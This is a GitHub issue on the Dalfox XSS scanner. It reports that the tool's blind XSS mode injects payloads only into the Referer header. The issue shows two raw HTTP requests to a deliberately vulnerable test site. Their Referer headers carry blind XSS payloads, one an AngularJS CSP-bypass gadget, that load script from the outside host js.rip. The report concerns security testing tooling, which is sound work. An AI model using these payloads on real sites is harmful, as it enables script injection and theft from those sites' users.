Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Blind XSS not working #473

Open
anasbousselham opened this issue May 21, 2023 · 0 comments
Open

Blind XSS not working #473

anasbousselham opened this issue May 21, 2023 · 0 comments
Labels
bug Something isn't working

Comments

@anasbousselham
Copy link

Hi,
Dalfox blind test only Header Referer: not the param. in the data of the POST request or the query's on the url.

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Referer: "'><script src=//js.rip/xxx></script>
Accept-Encoding: gzip, deflate
Connection: close

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Referer: "'><script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js></script><div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//js.rip/xxx'"></textarea></div>
Accept-Encoding: gzip, deflate
Connection: close
@anasbousselham anasbousselham added the bug Something isn't working label May 21, 2023
@anasbousselham anasbousselham mentioned this issue Aug 30, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@anasbousselham